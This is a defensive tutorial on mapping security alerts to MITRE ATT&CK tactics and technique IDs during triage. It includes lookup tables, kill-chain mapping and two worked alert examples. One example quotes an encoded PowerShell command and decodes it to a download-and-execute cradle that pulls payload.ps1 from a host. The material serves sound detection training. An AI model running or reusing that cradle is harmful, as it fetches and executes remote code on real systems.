MITRE ATT&CK for Triage

What MITRE ATT&CK Is and How Analysts Actually Use It

MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.
It is the common language of threat analysis — when one analyst says “T1003.001,” every analyst knows they mean “LSASS memory credential dumping.” The framework is organized into matrices (Enterprise, Mobile, ICS) with columns as tactics (the “why” — Credential Access, Lateral Movement, Exfiltration) and cells as techniques (the “how”).
Each technique has a unique ID (T1003), sub-techniques refine it (T1003.001), and every technique includes: a description, detection guidance, data sources that provide visibility, and mitigation recommendations.

The Triage Workflow — Finding the Right Technique ID

Most analysts don’t use ATT&CK by memorizing the entire matrix. They use a workflow. Here is the practical approach:

Step 1 — Read the alert, extract the action

Take any alert and ask: what did the adversary actually do?

Alert Description	Extracted Action	Likely Tactics
”Suspicious PowerShell from Office”	Office process spawned PowerShell	Execution (`T1204`), Defense Evasion (`T1055`)
“Failed logins from multiple accounts”	Authentication attempts, many usernames, one source	Credential Access (`T1110`)
“DNS queries to known bad domain”	Malware beaconing to C2	Command and Control (`T1071`)
“New admin account created on DC”	Account creation + privilege grant	Persistence (`T1098`), Privilege Escalation (`T1078`)
“Large outbound file transfer at 3 AM”	Data moving outside the network	Exfiltration (`T1048`)

Step 2 — Determine the tactic (the “why”)

Now ask: why would an attacker do this? What are they trying to achieve?

Observation	Tactic	Why
PowerShell from Office	Execution	Attacker is running code on the host
Logins from many accounts	Credential Access	Attacker is trying to get credentials
DNS to bad domain	Command and Control	Implant needs instructions
New admin account	Persistence	Attacker wants a backdoor if they lose current access
File transfer at 3 AM	Exfiltration	Attacker is stealing data

Step 3 — Find the technique (the “how”)

Now use the MITRE website, Navigator, or a local copy to find the specific technique ID. The navigation pattern is:

Go to attack.mitre.org or open ATT&CK Navigator
Click the tactic column (e.g., “Execution”)
Scan the technique names for what matches your observation
Click through to check the technique description, detection guidance, and data sources

Quick-reference lookup by behavior:

Behavior	Likely Technique ID
PowerShell.exe spawned by Office	`T1204.002` (User Execution: Malicious File)
Failed login attempts	`T1110` (Brute Force)
Successful login from new IP	`T1078` (Valid Accounts)
Process injection detected	`T1055` (Process Injection)
Registry Run key modified	`T1547.001` (Boot or Logon Autostart Execution: Registry Run Keys)
New service created	`T1543.003` (Create or Modify System Process: Windows Service)
WMI persistence	`T1546.003` (Event Triggered Execution: WMI Event Subscription)
Scheduled task created	`T1053.005` (Scheduled Task/Job: Scheduled Task)
DNS query to DGA domain	`T1568` (Dynamic Resolution)
LSASS process access	`T1003.001` (OS Credential Dumping: LSASS Memory)
DCSync replication	`T1003.006` (OS Credential Dumping: DCSync)
SMB file copy	`T1021.002` (Remote Services: SMB/Windows Admin Shares)
RDP connection	`T1021.001` (Remote Services: Remote Desktop)
Data to external IP on port 443	`T1048` (Exfiltration Over Alternative Protocol)

Step 4 — Use the technique page to guide investigation

Once you have the technique ID, read the MITRE page for that technique — specifically these three sections:

Detection — MITRE tells you what log sources to check for this technique. If the detection guidance says “Monitor for CLI arguments with suspicious words like Get-Keystrokes,” that’s your investigation next step.
Data Sources — MITRE lists the platforms and data sources that provide visibility. If it says “Process: Process Creation” you know to check Windows Event 4688 or Sysmon Event 1.
Mitigations — Sometimes you need to understand how the technique is blocked to understand the detection boundary (e.g., “Enable LSA Protection” for T1003.001).

Step 5 — Map to the kill chain

Once you know the technique ID and tactic, map it to the intrusion stage:

Kill Chain Stage	ATT&CK Tactics	You Should…
Reconnaissance	Reconnaissance, Resource Development	Check for scanning from this IP against other targets
Initial Access	Initial Access	Check the entry vector — email, VPN, vulnerability
Execution	Execution, Persistence	Check for follow-on process activity
Lateral Movement	Lateral Movement, Credential Access, Discovery	Check which hosts the attacker has moved to
C2 & Exfiltration	Command and Control, Exfiltration	Check outbound connections, DNS, data volumes
Impact	Impact (ransomware, destruction)	Begin containment — assume full compromise

Practical Use Cases

Use Case 1: Alert — PowerShell EncodedCommand

Alert: Sysmon Event 1 — `powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADAALgAxAC8AcABhAHkAbABvAGEAZAAuAHAAcwAxACcAKQA=

Extract action: Office spawned PowerShell running encoded command
Tactic: Execution (TA0002)
Technique: T1059.001 (PowerShell) — can refine to T1204.002 (User Execution: Malicious File) if triggered by user opening a document
MITRE page says: “Monitor CLI arguments for suspicious PowerShell commands like -EncodedCommand”
Investigation: Decode the base64 → reveals IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.1/payload.ps1') → confirms C2 fetch → check for outbound connection to that IP

Use Case 2: Alert — Impossible Travel

Alert: Azure AD — user logged in from New York, then from Moscow 15 minutes later

Extract action: User logged in from geographically impossible distance in short time
Tactic: Initial Access (TA0001) or Credential Access (TA0006)
Technique: T1078 (Valid Accounts) — stolen credentials being used by attacker. Sub-technique: T1078.004 (Cloud Accounts)
MITRE page says: “Monitor authentication logs for anomalous access patterns”
Investigation: Check if MFA was passed, what resource was accessed, whether the user has reported unusual activity. The New York login was legitimate user; the Moscow login is the attacker.

Common Mistakes When Using ATT&CK for Triage

Mistake	Why It Is a Problem	Better Approach
Memorizing all technique IDs	Wastes time and causes confusion. The matrix has 600+ techniques.	Know the top 30-50 most common. Use search for everything else.
Mapping to the wrong tactic	”This is a Credential Access technique” when it is actually Persistence	Ask “what is the attacker trying to achieve?” not “what tool did they use?”
Ignoring sub-techniques	`T1110` includes password guessing, spraying, and stuffing — very different behaviors	Always go to sub-technique level when the technique has them.
Over-mapping	Trying to map every event to a specific T-code	Not every alert needs a technique ID. Only map confirmed malicious activity.
Tactics as truth	Mapping technique to “Persistence” does not confirm it is only for persistence	Many techniques serve multiple tactical purposes. Document the full context.
Not sharing the technique ID	Your written incident report should include technique IDs so everyone understands the adversary behavior	Include T-code in every incident report.

Golden Ticket Attack — detection and response for T1558.001 techniques
Malware Analysis Triage — detection and response for T1204 techniques
Active Directory Basics — covers the active directory basics concepts
Common Ports and Protocols — covers the common ports and protocols concepts
Cloud Threats — Credential Theft, IMDS Abuse, Hijacking, Privilege Escalation — detection and response for T1525, T1552, T1613 techniques